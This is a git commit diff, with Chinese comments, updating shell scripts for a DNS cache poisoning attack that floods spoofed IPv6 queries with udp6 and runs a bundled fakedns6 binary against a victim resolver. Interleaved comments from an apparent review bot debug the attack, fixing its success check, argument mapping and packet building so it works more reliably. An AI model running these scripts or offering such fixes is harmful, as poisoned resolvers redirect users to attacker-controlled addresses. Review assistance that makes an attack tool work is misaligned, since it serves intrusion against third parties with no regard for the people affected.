authorroot <[email protected]>2023-11-16 09:38:21 +0000
committerroot <[email protected]>2023-11-16 09:38:21 +0000
commit950d9b5244e30f7ed6832718735d3011b10f6b81 (patch)
treee80c4ff4ebe9581e9d6115590fe7e8ab55803b0c
parente627141b7f6f999b0e410cfaafdb60989be0cd79 (diff)
同步
-rwxr-xr-x[-rw-r--r--]attack.sh22
-rw-r--r--dns.binbin0 -> 43 bytes
-rw-r--r--dns_mid.bin1
-rwxr-xr-x[-rw-r--r--]dns_query.sh25
-rwxr-xr-xfakedns6bin0 -> 8285472 bytes
-rw-r--r--txid.bin1
6 files changed, 29 insertions, 20 deletions
diff --git a/attack.sh b/attack.sh
index b53c12b..2b1a28d 100644..100755
--- a/attack.sh
+++ b/attack.sh
@@ -1,29 +1,35 @@
+#!/bin/bash
# This is a sample attack script and may not work properly. Please adjust the parameter accordingly.
# $1 for victim resolver IP, $2 for attacker-controlled domain, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
# Please run with sudo.
# Verify the existing record domain, just for proof purposes.
-echo '原记录:'
+echo '获取原记录中:'
dig @$1 $4 AAAA
-
success=0
while [ $success -ne 1 ]
do
success=0
- echo '10秒之后开始攻击...'
+ echo '等待缓存过期,10秒之后开始攻击...'
sleep 10
echo "开始攻击"
# flood
- success=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
+ ret=$(bash ./dns_query.sh $5 `echo $1` 789 `echo $4 | sed "s/\./ /g"`)
+ echo "$ret"
+ FINAL=`echo ${ret: -1}`
+ echo "$FINAL"
+ if [ "$FINAL" == "1" ];then
+ success=1
+ fi
# Start attack
# Change the argument accordingly
- time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
+ #echo "执行侧信道攻击脚本中"
+ #time ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
# Validations
- echo '攻击之后'
- dig @$1 $4 AAAA
+ #echo '一轮次攻击结束'
+ #dig @$1 $4 AAAA
echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
- echo "等待缓存过期"
done
# success
echo '检测到攻击成功实现'
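Review bot: The success test built on `FINAL=`echo ${ret: -1}`` keys on the last character of dns_query.sh's output, so a round in which dns_query.sh decides not to attack but prints `a:1` as its final progress line also ends in "1" and the loop reports success. Compare the whole last line instead, `FINAL=$(printf '%s\n' "$ret" | tail -n 1)` and `if [ "$FINAL" = "1" ]; then`, or have dns_query.sh emit a token that cannot collide with its progress output. With the post-round `dig @$1 $4 AAAA` now commented out, the closing message is no longer backed by an observed change in the resolver's record; if that is intended, a comment such as `# success here means dns_query.sh launched a round, not that the cache was observed poisoned` would stop readers from treating it as confirmation. `$1`, `$4` and `$5` also go unquoted throughout the loop and the `echo $1` substitution on the dns_query.sh line is redundant.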
diff --git a/dns.bin b/dns.bin
new file mode 100644
index 0000000..11d5802
--- /dev/null
+++ b/dns.bin
Binary files differ
diff --git a/dns_mid.bin b/dns_mid.bin
new file mode 100644
index 0000000..10b3b3b
--- /dev/null
+++ b/dns_mid.bin
@@ -0,0 +1 @@
+victimn64top \ No newline at end of file
diff --git a/dns_query.sh b/dns_query.sh
index 939df76..36a18c5 100644..100755
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -1,9 +1,11 @@
-# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] space-separated-domain... (e.g. www google com)
+# usage ./dns_query.sh [NS IP] [Resolver IP(spoofed as source IP)] [flag] space-separated-domain... (e.g. www google com)
# clear the previous files
-dd if=/dev/null of=dns_mid.bin
-dd if=/dev/null of=txid.bin
+sleep 1
+echo "初始化工具环境"
+dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
+dd if=/dev/null of=txid.bin > /dev/null 2>&1
# write the domain name into the binary
-for var in ${@:3}
+for var in ${@:4}
do
size=${#var}
echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin
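Review bot: This commit makes dns_query.sh executable (100644 → 100755) but the file still has no shebang — its first line is the usage comment at the top of this hunk — so running `./dns_query.sh` directly depends on whichever shell the kernel defaults to, while the script relies on bash features (`${@:4}`, `$RANDOM`, `${#var}`, `echo -en`); add `#!/bin/bash` as the first line. Nothing in the label loop checks that each label is 1–63 bytes (RFC 1035 caps labels at 63), so an over-long or empty label writes a length octet the receiver will not read as a length; a guard before the write, `[ "$size" -ge 1 ] && [ "$size" -le 63 ] || { echo "bad label: $var" >&2; exit 1; }`, keeps the generated dns.bin well-formed. The loop's `done` lies outside the hunk.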
@@ -16,15 +18,14 @@ echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
# change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
# fire!
-echo "fire"
-udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2
-a=$RANDOM
-RANGE=10
-let "a %= $RANGE"
-echo $a
-if a -gt 8; then
+echo "尝试触发权威服务器请求速率限制"
+udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
+sleep 1
+a=$(($RANDOM % 10))
+echo "a:$a"
+if [ $a -gt 5 ]; then
./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
- echo 1
+ echo "1"
fi
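Review bot: The fakedns6 call guarded by the corrected `if [ $a -gt 5 ]` still uses attack.sh's positional layout (`-a $5 -b $1 -i $3 -n $4 -r $1 -at $2`), but inside dns_query.sh the usage line defines `$1` as the NS IP, `$2` as the resolver, `$3` as the flag and `$4 $5 …` as domain labels, so with attack.sh's invocation (`$5 $1 789 label…`) the interface becomes `789`, `-n` gets the first label and `-a` the second. The old `if a -gt 8` never reached this branch, so the mismatch only goes live with this commit; unless fakedns6 reads these flags differently from the now commented-out attack.sh line, map the addresses as `-a "$1" -b "$2" -r "$2"` and pass the interface, full victim name and attacker domain in explicitly, for example through the otherwise unused flag slot. Output is discarded and `echo "1"` runs regardless of exit status, so a fakedns6 that fails to start is still reported as a launched round; `if ./fakedns6 … >/dev/null 2>&1; then echo "1"; fi` ties the flag to a run that succeeded. The 40 % gate on `$RANDOM` is unexplained; a short comment on why the attack is launched only on some rounds would help the next reader.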
diff --git a/fakedns6 b/fakedns6
new file mode 100755
index 0000000..5b13e5c
--- /dev/null
+++ b/fakedns6
Binary files differ
diff --git a/txid.bin b/txid.bin
new file mode 100644
index 0000000..ffb0f65
--- /dev/null
+++ b/txid.bin
@@ -0,0 +1 @@
+U \ No newline at end of file